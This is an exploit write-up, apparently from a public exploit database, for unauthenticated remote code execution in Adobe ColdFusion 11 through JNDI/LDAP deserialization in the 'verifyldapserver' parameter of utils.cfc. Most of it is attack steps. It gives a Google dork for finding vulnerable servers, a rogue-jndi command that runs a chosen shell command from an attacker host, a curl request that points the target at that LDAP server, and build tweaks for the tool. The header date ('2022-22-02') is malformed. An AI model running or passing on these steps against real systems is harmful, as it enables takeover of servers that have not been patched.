Adobe ColdFusion 11 Remote Code Execution

`# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)  
# Google Dork: intext:"adobe coldfusion 11"  
# Date: 2022-22-02  
# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)  
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html  
# Version: Adobe Coldfusion (11.0.03.292866)  
# Tested on: Microsoft Windows Server & Linux  
  
# Description:  
# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.  
# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc  
  
==================== 1.Setup rogue-jndi Server ====================  
  
https://github.com/veracode-research/rogue-jndi  
  
  
==================== 2.Preparing the Attack =======================  
  
java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"  
  
==================== 3.Launch the Attack ==========================  
  
  
http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json  
  
  
curl -i -s -k -X $'GET' \  
-H $'Host: target' \  
--data-binary $'\x0d\x0a\x0d\x0a' \  
$'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json'  
  
  
==================== 4.RCE =======================================  
  
Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8   
Can be done by modify the pom.xml as below  
  
<configuration>  
<source>7</source>  
<target>7</target>  
</configuration>  
  
`